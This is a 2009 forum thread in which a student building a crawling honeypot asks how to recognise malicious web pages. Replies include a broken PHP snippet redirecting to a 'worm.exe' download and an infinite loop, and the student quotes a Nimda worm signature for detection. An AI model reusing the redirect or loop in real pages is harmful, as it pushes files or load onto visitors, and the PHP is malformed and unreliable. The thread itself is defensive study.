8 Replies - 1792 Views - Last Post: 14 June 2009 - 02:43 AM

#1 naseem.fci  Icon User is offline

  • New D.I.C Head

Reputation: 0
  • View blog
  • Posts: 11
  • Joined: 15-March 09

How can an IDS detect malicious web pages?

Posted 03 May 2009 - 02:23 PM

I want a help
my question is "how can an intrusion detection
system (IDS) analyse the web pages in order to iedtify
malicious ones"?

I know that the system can moniter the changes on
on the registry, file system,........etc. But I
ask about the second way in which the system know
the content of the page.

In other words
"what are the features or properties of malicious
web pages"?
"Is It necessary to know all features of all computer worms, viruses, trojan horses,......etc ? If so, I want a help in how can i indicate the features of each".

Thanks you.

Is This A Good Question/Topic? 0
  • +

Replies To: How can an IDS detect malicious web pages?

#2 BlakeJustBlake  Icon User is offline

  • D.I.C Regular
  • member icon

Reputation: 26
  • View blog
  • Posts: 441
  • Joined: 15-February 09

Re: How can an IDS detect malicious web pages?

Posted 03 May 2009 - 03:17 PM

Sounds like someone's homework.
Was This Post Helpful? 0
  • +
  • -

#3 no2pencil  Icon User is online

  • Toubabo Koomi
  • member icon

Reputation: 5247
  • View blog
  • Posts: 27,069
  • Joined: 10-May 07

Re: How can an IDS detect malicious web pages?

Posted 04 May 2009 - 12:18 PM

View Postnaseem.fci, on 3 May, 2009 - 03:23 PM, said:

my question is "how can an intrusion detection
system (IDS) analyse the web pages in order to iedtify
malicious ones"?

An IDS detects intrusions, hense the name. It doesn't look at websites.


View PostBlakeJustBlake, on 3 May, 2009 - 04:17 PM, said:

Sounds like someone's homework.

That explains why it was posted in *Student Campus*

I'll move it to Networking.
Was This Post Helpful? 0
  • +
  • -

#4 naseem.fci  Icon User is offline

  • New D.I.C Head

Reputation: 0
  • View blog
  • Posts: 11
  • Joined: 15-March 09

Re: How can an IDS detect malicious web pages?

Posted 05 May 2009 - 05:32 AM

It seems that you don't understand me!

I will explain:

I'm a student in the faculty of computer and information sciences, we are asked to do team work projects; I'm a member in the group of the "honey net" project; we have a source code that simulate a honeypot which visits an initial specified web page, checks it, then
collects the links inside it in order to visit each one next and reapeat this for every page.

The honey pot runs each visited page and moniters the changes in memory and cpu recources; it also checks for file system changes. It put limits for consuming each recourse, if these limits are exceeded it decides that the visited page is malicious.

The future work that we want to achieve is to make the honeyput analyse the web page and examine its content in order to know if it contains a computer worm, virus, trojan horse,.........etc.

I was asked to do a search to know specific features of the pages that contain harmful content.

I searched about that, but I found that most information talks about the harmful effects of those malicious contents; I can't extract the specific features or properties of the malicious contents, so ,I don't know how the honeypot can detect these pages.

I don't want you to do my work; but I asked for ideas or starting points after which I can continue in a right way.

thanks.
Was This Post Helpful? 0
  • +
  • -

#5 numeric  Icon User is offline

  • D.I.C Head

Reputation: 9
  • View blog
  • Posts: 77
  • Joined: 12-January 09

Re: How can an IDS detect malicious web pages?

Posted 07 May 2009 - 04:24 PM

Pretty much anything on a web page can contain harmful content - links, images even forum posts. Both server side and client side code can be used in attacks. You'll need a way of monitoring whats being sent to and from your test computer and through which ports in addition to the features that you already mentioned.

I can't really give you any examples without flirting with the forum policy on hacking - send me an email via my blog and I'll send you some links if you want them.

-n
Was This Post Helpful? 0
  • +
  • -

#6 DingleNutZ  Icon User is offline

  • D.I.C Head

Reputation: 0
  • View blog
  • Posts: 121
  • Joined: 02-May 09

Re: How can an IDS detect malicious web pages?

Posted 04 June 2009 - 05:56 PM

php pages can be used maliciously, so it could pick a certain web page using up more CPU than what it should or whether it has automated links to download files onto a computer, an example of this would be:
<?php

//automated download
header ( Location:"www.page.com/worm.exe");


//extensive CPU usage
do{i+1)while(true);


?>



javascript is could also easily be used to write malicious code.

so IDS could pick up an automated file being downloaded....
ummm....yea not too sure, that is what it could pick up, but that isnt how it would pic it up
Was This Post Helpful? 0
  • +
  • -

#7 naseem.fci  Icon User is offline

  • New D.I.C Head

Reputation: 0
  • View blog
  • Posts: 11
  • Joined: 15-March 09

Re: How can an IDS detect malicious web pages?

Posted 14 June 2009 - 12:39 AM

View Postnumeric, on 7 May, 2009 - 03:24 PM, said:

Pretty much anything on a web page can contain harmful content - links, images even forum posts. Both server side and client side code can be used in attacks. You'll need a way of monitoring whats being sent to and from your test computer and through which ports in addition to the features that you already mentioned.

I can't really give you any examples without flirting with the forum policy on hacking - send me an email via my blog and I'll send you some links if you want them.

-n


so sorry for being late in reply.
I was in exams.
Thanks very much for your offer.
I will send you an e-mail.


View PostDingleNutZ, on 4 Jun, 2009 - 04:56 PM, said:

php pages can be used maliciously, so it could pick a certain web page using up more CPU than what it should or whether it has automated links to download files onto a computer, an example of this would be:
<?php

//automated download
header ( Location:"www.page.com/worm.exe");


//extensive CPU usage
do{i+1)while(true);


?>



javascript is could also easily be used to write malicious code.

so IDS could pick up an automated file being downloaded....
ummm....yea not too sure, that is what it could pick up, but that isnt how it would pic it up


Thanks very much.
we have some progress in our project.
I will explain in the next reply.
Was This Post Helpful? 0
  • +
  • -

#8 naseem.fci  Icon User is offline

  • New D.I.C Head

Reputation: 0
  • View blog
  • Posts: 11
  • Joined: 15-March 09

Re: How can an IDS detect malicious web pages?

Posted 14 June 2009 - 01:17 AM

we arrive to a specific piont in our project

each internet worm or virus have its own signature. we decided to search for theses signatures and used it as a critria that distinguish a malicious page from others.

we already now have some signatures such as

*the signature of Nimda worm:-

<script language="Javascript">
windows.open("readme.eml",null,"resizable=no, top=6000, left=6000")
</script>

my qustion here is: can we pass this signature to a method in our code and then the system can check to find this text in the web-page, or we must use a regular expression for each signature?

sorry for nuisance.
Was This Post Helpful? 0
  • +
  • -

#9 naseem.fci  Icon User is offline

  • New D.I.C Head

Reputation: 0
  • View blog
  • Posts: 11
  • Joined: 15-March 09

Re: How can an IDS detect malicious web pages?

Posted 14 June 2009 - 02:43 AM

sorry numeric it seems that i did understand falsy what your blog means!

please tell me how i can send you an e-mail.
Was This Post Helpful? 0
  • +
  • -

Page 1 of 1